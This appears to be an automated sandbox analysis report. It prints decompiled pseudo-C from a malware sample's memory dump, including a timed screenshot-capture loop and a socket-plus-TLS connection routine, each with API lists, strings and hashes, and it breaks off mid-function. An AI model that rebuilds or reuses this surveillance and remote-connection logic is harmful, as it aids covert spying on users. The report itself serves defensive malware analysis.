                                                                                                0x004135ee
                                                                                                0x004135f0
                                                                                                0x004135fa
                                                                                                0x004135fc
                                                                                                0x004135fe
                                                                                                0x00413604
                                                                                                0x00413dd2
                                                                                                0x00413dd2
                                                                                                0x00413dd7
                                                                                                0x00413ddc
                                                                                                0x00413de0
                                                                                                0x00413de5
                                                                                                0x00413de9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041360b
                                                                                                0x00413610
                                                                                                0x00413612
                                                                                                0x00413617
                                                                                                0x0041361c
                                                                                                0x00413621
                                                                                                0x00413623
                                                                                                0x00413628
                                                                                                0x0041362c
                                                                                                0x0041362d
                                                                                                0x0041362f
                                                                                                0x00413647
                                                                                                0x0041364c
                                                                                                0x00413651
                                                                                                0x00413653
                                                                                                0x00413658
                                                                                                0x0041365c
                                                                                                0x0041365d
                                                                                                0x0041365f
                                                                                                0x0041367a
                                                                                                0x0041367f
                                                                                                0x00413684
                                                                                                0x00413686
                                                                                                0x0041368b
                                                                                                0x0041368d
                                                                                                0x004136c2
                                                                                                0x004136c9
                                                                                                0x004136d0
                                                                                                0x004136d4
                                                                                                0x004136d6
                                                                                                0x004136db
                                                                                                0x004136e0
                                                                                                0x004136e2
                                                                                                0x004136e7
                                                                                                0x004136e8
                                                                                                0x004136ea
                                                                                                0x004136f0
                                                                                                0x004136f4
                                                                                                0x004136f9
                                                                                                0x004136fe
                                                                                                0x00413700
                                                                                                0x00413705
                                                                                                0x00413707
                                                                                                0x0041370d
                                                                                                0x0041370e
                                                                                                0x0041370f
                                                                                                0x00000000
                                                                                                0x0041370f
                                                                                                0x004136ec
                                                                                                0x004136ec
                                                                                                0x004136ed
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x0041368f
                                                                                                0x0041368f
                                                                                                0x00413692
                                                                                                0x0041369b
                                                                                                0x0041369d
                                                                                                0x004136a3
                                                                                                0x004136a8
                                                                                                0x004136a8
                                                                                                0x00000000
                                                                                                0x004136a8
                                                                                                0x00413661
                                                                                                0x00413668
                                                                                                0x0041366a
                                                                                                0x00413670
                                                                                                0x00413675
                                                                                                0x00000000
                                                                                                0x00413675
                                                                                                0x00413631
                                                                                                0x00413638
                                                                                                0x0041363a
                                                                                                0x00413640
                                                                                                0x004136ab
                                                                                                0x004136ab
                                                                                                0x004136ad
                                                                                                0x004136ad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004137b2
                                                                                                0x004137b3
                                                                                                0x004137b9
                                                                                                0x004137bb
                                                                                                0x004137c9
                                                                                                0x004137d3
                                                                                                0x004137db
                                                                                                0x004137e1
                                                                                                0x004137e8
                                                                                                0x004137ec
                                                                                                0x004137f0
                                                                                                0x004137f5
                                                                                                0x004137f8
                                                                                                0x004137fc
                                                                                                0x004137fe
                                                                                                0x00413803
                                                                                                0x00413805
                                                                                                0x0041380a
                                                                                                0x00413bb3
                                                                                                0x00413bb3
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041371f
                                                                                                0x00413721
                                                                                                0x00413727
                                                                                                0x0041372e
                                                                                                0x00413737
                                                                                                0x00413739
                                                                                                0x0041373e
                                                                                                0x0041374d
                                                                                                0x00413750
                                                                                                0x00413757
                                                                                                0x0041375b
                                                                                                0x00413762
                                                                                                0x00413764
                                                                                                0x0041376b
                                                                                                0x00413774
                                                                                                0x0041378f
                                                                                                0x00000000
                                                                                                0x0041378f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413798
                                                                                                0x0041379e
                                                                                                0x004137a0
                                                                                                0x004137a6
                                                                                                0x004137ac
                                                                                                0x004137ac
                                                                                                0x00000000
                                                                                                0x004137ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413814
                                                                                                0x00413816
                                                                                                0x00413820
                                                                                                0x00413822
                                                                                                0x00413828
                                                                                                0x0041382c
                                                                                                0x00413833
                                                                                                0x00413835
                                                                                                0x0041383a
                                                                                                0x0041383c
                                                                                                0x0041383e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413848
                                                                                                0x0041384c
                                                                                                0x00413850
                                                                                                0x00413854
                                                                                                0x00413858
                                                                                                0x00413861
                                                                                                0x00413863
                                                                                                0x00413868
                                                                                                0x0041386c
                                                                                                0x0041386e
                                                                                                0x00413874
                                                                                                0x00413877
                                                                                                0x0041387d
                                                                                                0x00413881
                                                                                                0x0041388e
                                                                                                0x00413219
                                                                                                0x00413219
                                                                                                0x00413219
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413898
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138a4
                                                                                                0x004138a8
                                                                                                0x004138ad
                                                                                                0x004138b0
                                                                                                0x004138b8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138c4
                                                                                                0x004138c8
                                                                                                0x004138cd
                                                                                                0x004138d0
                                                                                                0x004138d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138e4
                                                                                                0x004138e8
                                                                                                0x004138ed
                                                                                                0x004138f0
                                                                                                0x004138f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413902
                                                                                                0x00413903
                                                                                                0x00413908
                                                                                                0x0041390a
                                                                                                0x00413910
                                                                                                0x00413912
                                                                                                0x00413918
                                                                                                0x0041391a
                                                                                                0x00413924
                                                                                                0x0041392b
                                                                                                0x0041392c
                                                                                                0x00413937
                                                                                                0x00413939
                                                                                                0x00413944
                                                                                                0x0041394e
                                                                                                0x00413950
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041395c
                                                                                                0x00413960
                                                                                                0x00413965
                                                                                                0x00413968
                                                                                                0x00413970
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004139a6
                                                                                                0x004139aa
                                                                                                0x004139af
                                                                                                0x004139b2
                                                                                                0x004139ba
                                                                                                0x00413b0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412e59
                                                                                                0x00412e51
                                                                                                0x00412e47
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: HF$HF$HF$PF
                                                                                                • API String ID: 180926312-3347331645
                                                                                                • Opcode ID: 8d39ebd075f2e4d30771cb62cde4870a410da87c6548a22669e7f1b012373cd2
                                                                                                • Instruction ID: 12f824fe3a0a4d57d23bdaa83c3e91856d9f09159caa76b9d1b7f9d133a57d07
                                                                                                • Opcode Fuzzy Hash: 8d39ebd075f2e4d30771cb62cde4870a410da87c6548a22669e7f1b012373cd2
                                                                                                • Instruction Fuzzy Hash: 0FE190716083005BC614FB72D957AEE76A89B90308F40093FF546A71E2EE7C9E49C69B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0044A796(intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr* _t26;
                                                                                                				intOrPtr _t28;
                                                                                                				intOrPtr* _t29;
                                                                                                				intOrPtr* _t31;
                                                                                                				intOrPtr* _t45;
                                                                                                				intOrPtr* _t46;
                                                                                                				intOrPtr* _t47;
                                                                                                				intOrPtr* _t55;
                                                                                                				intOrPtr* _t70;
                                                                                                				intOrPtr _t74;
                                                                                                
                                                                                                				_t74 = _a4;
                                                                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                				if(_t25 != 0 && _t25 != 0x46c178) {
                                                                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                							E004414D5(_t46);
                                                                                                							E004499D2( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                						}
                                                                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                							E004414D5(_t47);
                                                                                                							E00449E8C( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                						}
                                                                                                						E004414D5( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                						E004414D5( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                					}
                                                                                                				}
                                                                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                					E004414D5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                					E004414D5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                					E004414D5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                					E004414D5( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                				}
                                                                                                				E0044A909( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                				_t28 = 6;
                                                                                                				_t55 = _t74 + 0xa0;
                                                                                                				_v8 = _t28;
                                                                                                				_t70 = _t74 + 0x28;
                                                                                                				do {
                                                                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x46c298) {
                                                                                                						_t31 =  *_t70;
                                                                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                							E004414D5(_t31);
                                                                                                							E004414D5( *_t55);
                                                                                                						}
                                                                                                						_t28 = _v8;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                							E004414D5(_t29);
                                                                                                						}
                                                                                                						_t28 = _v8;
                                                                                                					}
                                                                                                					_t55 = _t55 + 4;
                                                                                                					_t70 = _t70 + 0x10;
                                                                                                					_t28 = _t28 - 1;
                                                                                                					_v8 = _t28;
                                                                                                				} while (_t28 != 0);
                                                                                                				return E004414D5(_t74);
                                                                                                			}
















                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0044A7DA
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 004499EF
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A01
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A13
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A25
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A37
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A49
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A5B
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A6D
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A7F
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A91
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AA3
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AB5
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AC7
                                                                                                • _free.LIBCMT ref: 0044A7CF
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0044A7F1
                                                                                                • _free.LIBCMT ref: 0044A806
                                                                                                • _free.LIBCMT ref: 0044A811
                                                                                                • _free.LIBCMT ref: 0044A833
                                                                                                • _free.LIBCMT ref: 0044A846
                                                                                                • _free.LIBCMT ref: 0044A854
                                                                                                • _free.LIBCMT ref: 0044A85F
                                                                                                • _free.LIBCMT ref: 0044A897
                                                                                                • _free.LIBCMT ref: 0044A89E
                                                                                                • _free.LIBCMT ref: 0044A8BB
                                                                                                • _free.LIBCMT ref: 0044A8D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 5cecdca5b1c34f3a4b02b1176522f84f357f73c3a3e7df90d1abd73a0d0aed16
                                                                                                • Instruction ID: d2a2797c9a58acaa18c78beddbbc7da76900a29e410abb4f836319af01a7758d
                                                                                                • Opcode Fuzzy Hash: 5cecdca5b1c34f3a4b02b1176522f84f357f73c3a3e7df90d1abd73a0d0aed16
                                                                                                • Instruction Fuzzy Hash: BE313D31540605AFFB20AE7AD845B5B73F8EF40364F14842FE459DB661DF38ACA18B29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E0041630B() {
                                                                                                				intOrPtr* _t42;
                                                                                                				void* _t45;
                                                                                                				char* _t54;
                                                                                                				void* _t72;
                                                                                                				long _t78;
                                                                                                				void* _t83;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t85;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t92;
                                                                                                				void* _t131;
                                                                                                				void* _t132;
                                                                                                				void* _t140;
                                                                                                				void* _t141;
                                                                                                				void* _t146;
                                                                                                				intOrPtr _t147;
                                                                                                				void* _t148;
                                                                                                				void* _t149;
                                                                                                				void* _t150;
                                                                                                
                                                                                                				E00452248(E004537FE, _t146);
                                                                                                				_push(_t141);
                                                                                                				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                                                                                                				_t92 = 0;
                                                                                                				 *((intOrPtr*)(_t146 - 4)) = 0;
                                                                                                				_t149 =  *0x46de94 - _t92; // 0x0
                                                                                                				if(_t149 == 0) {
                                                                                                					_t147 = _t147 - 0xc;
                                                                                                					_t131 = _t146 - 0x68;
                                                                                                					E00414DBD(_t131);
                                                                                                					__imp__GdiplusStartup(0x46de94, _t131, 0);
                                                                                                				}
                                                                                                				_t150 =  *0x46dd64 - _t92; // 0x0
                                                                                                				if(_t150 == 0) {
                                                                                                					E00401EEC(0x46e990, _t132, _t141, E00415862(_t146 - 0x40));
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				_t42 = E00401F87(E00401E3B(0x46e3a4, _t132, _t150, 0x19));
                                                                                                				_t45 = E00401EDD(E00417CCA(_t146 - 0x58, E00401E3B(0x46e3a4, _t132, _t150, 0x1a)));
                                                                                                				_t134 =  *_t42;
                                                                                                				E00401EEC(0x46e978,  *_t42, 0x46e978, E00418A4B(_t146 - 0x40,  *_t42, _t45));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				CreateDirectoryW(E00401EDD(0x46e978), _t92);
                                                                                                				E00401F5F(_t92, _t146 - 0xb0);
                                                                                                				E00401F5F(_t92, _t146 - 0x80);
                                                                                                				 *(_t146 - 0x11) = _t92;
                                                                                                				 *0x46dd5f = 1;
                                                                                                				_t54 =  *((intOrPtr*)(_t146 + 8));
                                                                                                				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                                                				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                                                				_t140 = Sleep;
                                                                                                				L6:
                                                                                                				while(1) {
                                                                                                					if( *_t54 != 1) {
                                                                                                						L11:
                                                                                                						GetLocalTime(_t146 - 0x28);
                                                                                                						_push( *(_t146 - 0x1c) & 0x0000ffff);
                                                                                                						_push( *(_t146 - 0x1e) & 0x0000ffff);
                                                                                                						_push( *(_t146 - 0x20) & 0x0000ffff);
                                                                                                						_push( *(_t146 - 0x22) & 0x0000ffff);
                                                                                                						_push( *(_t146 - 0x26) & 0x0000ffff);
                                                                                                						E00414D96(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                                                                                                						_t147 = _t147 + 0x20;
                                                                                                						E00401EEC(_t146 - 0x80, _t66, _t145, E00403098(_t92, _t146 - 0x58, E00403098(_t92, _t146 - 0x40, E00407677(_t146 - 0x98, 0x46e978, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						_t72 = E00401EDD(_t146 - 0x80);
                                                                                                						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                                                                                                						E00416141(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                                                                                                						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                                                                                                						if(__eflags != 0) {
                                                                                                							_t92 = 0;
                                                                                                							 *(_t146 - 0x11) = 0;
                                                                                                							_t78 = E004374E4(_t75, E00401F87(E00401E3B(0x46e3a4, _t134, __eflags, 0x18))) * 0x3e8;
                                                                                                							__eflags = _t78;
                                                                                                						} else {
                                                                                                							_t78 = E004374E4(_t79, E00401F87(E00401E3B(0x46e3a4, _t134, __eflags, 0x15))) * 0xea60;
                                                                                                						}
                                                                                                						Sleep(_t78);
                                                                                                						_t54 =  *((intOrPtr*)(_t146 + 8));
                                                                                                						continue;
                                                                                                					}
                                                                                                					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                                                					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                                                					while(1) {
                                                                                                						_t153 = _t92;
                                                                                                						if(_t92 != 0) {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						_t83 = E00401F87(E00401E3B(0x46e3a4, _t134, _t153, 0x17));
                                                                                                						_t148 = _t147 - 0x18;
                                                                                                						E00404260(_t92, _t148, _t83);
                                                                                                						_t85 = E004184AF(0, _t134);
                                                                                                						_t147 = _t148 + 0x18;
                                                                                                						_t92 = _t85;
                                                                                                						 *(_t146 - 0x11) = _t92;
                                                                                                						if(_t92 != 0) {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						Sleep(0x3e8);
                                                                                                					}
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}





















                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00416310
                                                                                                • GdiplusStartup.GDIPLUS(0046DE94,?,00000000), ref: 00416342
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                  • Part of subcall function 00416141: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 0041619A
                                                                                                  • Part of subcall function 00416141: DeleteFileW.KERNEL32(00000000,0000001B), ref: 0041622B
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004163CE
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00416454
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041645C
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041654B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                                                                                                • String ID: hpg$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$xF$xF
                                                                                                • API String ID: 3280235481-2293023947
                                                                                                • Opcode ID: 313b1be5ae3372f7bd9e64ce5b0250c6ad060bfb1c1ab4b838b2b67b7bf01a3c
                                                                                                • Instruction ID: 74a208efe839abcac81c568a116496f0d886130fd42da51a66afaadc87193c6b
                                                                                                • Opcode Fuzzy Hash: 313b1be5ae3372f7bd9e64ce5b0250c6ad060bfb1c1ab4b838b2b67b7bf01a3c
                                                                                                • Instruction Fuzzy Hash: B0519270A002189ACB14FBB6C856AED77A99F55308F40007FF906A71D2EE7C8D85C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E004049DE(void* __ecx, void* __esi) {
                                                                                                				char _v32;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				intOrPtr _t21;
                                                                                                				int _t22;
                                                                                                				void* _t26;
                                                                                                				signed int _t31;
                                                                                                				void* _t32;
                                                                                                				void* _t33;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t34;
                                                                                                				void* _t42;
                                                                                                				void* _t43;
                                                                                                				void* _t51;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                				void* _t58;
                                                                                                				void* _t80;
                                                                                                				void* _t81;
                                                                                                				void* _t83;
                                                                                                				void* _t84;
                                                                                                				void* _t85;
                                                                                                				void* _t101;
                                                                                                				void* _t102;
                                                                                                
                                                                                                				_t83 = __esi;
                                                                                                				_t54 = __ecx;
                                                                                                				_t21 =  *0x46dacc; // 0x0
                                                                                                				_t85 = _t84 - 0x1c;
                                                                                                				_t81 = __ecx;
                                                                                                				_t3 = _t81 + 4; // 0xffffffff
                                                                                                				__imp__#4( *_t3,  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t80, _t51);
                                                                                                				if(_t21 != 0) {
                                                                                                					__eflags =  *((char*)(__ecx + 0x31));
                                                                                                					if( *((char*)(__ecx + 0x31)) != 0) {
                                                                                                						__imp__#111();
                                                                                                						_t56 = _t21 - 0x2736;
                                                                                                						__eflags = _t56;
                                                                                                						if(_t56 != 0) {
                                                                                                							__eflags = _t56 == 0x17;
                                                                                                							if(_t56 == 0x17) {
                                                                                                								_t86 = _t85 - 0x18;
                                                                                                								_t58 = _t85 - 0x18;
                                                                                                								_push("Connection Refused");
                                                                                                								goto L20;
                                                                                                							} else {
                                                                                                								_t26 = E00418C47( &_v32, _t21);
                                                                                                								_t89 = _t85 - 0x18;
                                                                                                								E004053F2(_t51, _t85 - 0x18, "Connection Failed: ", _t81, __eflags, _t26);
                                                                                                								E00402076(_t51, _t89 - 0x14, "E");
                                                                                                								E00417670(_t51, _t81);
                                                                                                								E00401FB9();
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					goto L21;
                                                                                                				} else {
                                                                                                					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
                                                                                                						L14:
                                                                                                						_t22 = 1;
                                                                                                					} else {
                                                                                                						_t105 =  *((intOrPtr*)(__ecx + 0x31)) - _t21;
                                                                                                						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
                                                                                                							_t101 = _t85 - 0x18;
                                                                                                							_t6 = _t81 + 0x34; // 0x46e29c
                                                                                                							E00405416(_t101, "TLS Handshake...      | ", _t105, _t6);
                                                                                                							_t102 = _t101 - 0x14;
                                                                                                							_t54 = _t102;
                                                                                                							E00402076(_t51, _t102, "i");
                                                                                                							E00417670(_t51, _t81);
                                                                                                							_t85 = _t102 + 0x30;
                                                                                                						}
                                                                                                						_t31 = E0041D1EF(_t51, _t54);
                                                                                                						 *(_t81 + 0x4c) = _t31;
                                                                                                						if(_t31 != 0) {
                                                                                                							_t8 = _t81 + 4; // 0xffffffff
                                                                                                							_t78 =  *_t8;
                                                                                                							_t32 = E0041D413(_t31,  *_t8);
                                                                                                							__eflags = _t32 - 1;
                                                                                                							if(_t32 == 1) {
                                                                                                								_t33 = E0041DF42();
                                                                                                								__eflags = _t33 - 1;
                                                                                                								if(_t33 == 1) {
                                                                                                									_t34 = E0041D38A(_t51);
                                                                                                									 *((intOrPtr*)(_t81 + 0x50)) = _t34;
                                                                                                									__eflags = _t34;
                                                                                                									if(_t34 == 0) {
                                                                                                										_t92 = _t85 - 0x18;
                                                                                                										E00402076(_t51, _t85 - 0x18, "TLS Error 3");
                                                                                                										E00402076(_t51, _t92 - 0x18, "E");
                                                                                                										E00417670(_t51, _t81);
                                                                                                									}
                                                                                                									__eflags = 0;
                                                                                                									 *((intOrPtr*)(_t81 + 0x70)) = CreateEventW(0, 0, 1, 0);
                                                                                                									 *((intOrPtr*)(_t81 + 0x6c)) = CreateEventW(0, 0, 1, 0);
                                                                                                									goto L14;
                                                                                                								} else {
                                                                                                									_t95 = _t85 - 0x18;
                                                                                                									E00402076(_t51, _t85 - 0x18, "TLS Authentication Failed");
                                                                                                									E00402076(_t51, _t95 - 0x18, "E");
                                                                                                									_t42 = E00417670(_t51, _t81);
                                                                                                									_t13 = _t81 + 0x4c; // 0x0
                                                                                                									_t43 = E0041D63C(_t42,  *_t13);
                                                                                                									goto L8;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t98 = _t85 - 0x18;
                                                                                                								E00402076(_t51, _t85 - 0x18, "TLS Error 2");
                                                                                                								E00402076(_t51, _t98 - 0x18, "E");
                                                                                                								_t43 = E00417670(_t51, _t81);
                                                                                                								L8:
                                                                                                								_t9 = _t81 + 0x4c; // 0x0
                                                                                                								E0041D235(_t43, _t51,  *_t9, _t78, _t81, _t83);
                                                                                                								 *(_t81 + 0x4c) =  *(_t81 + 0x4c) & 0x00000000;
                                                                                                								goto L21;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t86 = _t85 - 0x18;
                                                                                                							_t58 = _t85 - 0x18;
                                                                                                							_push("TLS Error 1");
                                                                                                							L20:
                                                                                                							E00402076(_t51, _t58);
                                                                                                							E00402076(_t51, _t86 - 0x18, "E");
                                                                                                							E00417670(_t51, _t81);
                                                                                                							L21:
                                                                                                							_t22 = 0;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t22;
                                                                                                			}


























                                                                                                APIs
                                                                                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,00404BD8,0000000C,00000000), ref: 00404B16
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,00404BD8,0000000C,00000000), ref: 00404B24
                                                                                                • WSAGetLastError.WS2_32(?,00404BD8,0000000C,00000000), ref: 00404B37
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 8fef071ab9383901f1b295146032d939836121d8be598bc45199595a59577687
                                                                                                • Instruction ID: b28af7c78457be51f7caf1b04bd0ab349764154e9a31ca13bace76ce62a494c6
                                                                                                • Opcode Fuzzy Hash: 8fef071ab9383901f1b295146032d939836121d8be598bc45199595a59577687
                                                                                                • Instruction Fuzzy Hash: 3E41DBB1F4060177D604B77AC91BA6E7629AB81358B40412FF50216AD3EA7DD860C7DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E00449AD0(void* __edx, char _a4) {
                                                                                                				void* _v8;
                                                                                                				void* _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr* _v20;
                                                                                                				signed int _v24;
                                                                                                				char _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t105;
                                                                                                				char _t195;
                                                                                                				char _t210;
                                                                                                				signed int _t213;
                                                                                                				void* _t224;
                                                                                                				char* _t226;
                                                                                                				signed int _t227;
                                                                                                				signed int _t231;
                                                                                                				signed int _t232;
                                                                                                				void* _t234;
                                                                                                				void* _t236;
                                                                                                				signed int _t237;
                                                                                                				signed int _t238;
                                                                                                				signed int _t239;
                                                                                                				signed int _t240;
                                                                                                				signed int _t241;
                                                                                                				signed int _t242;
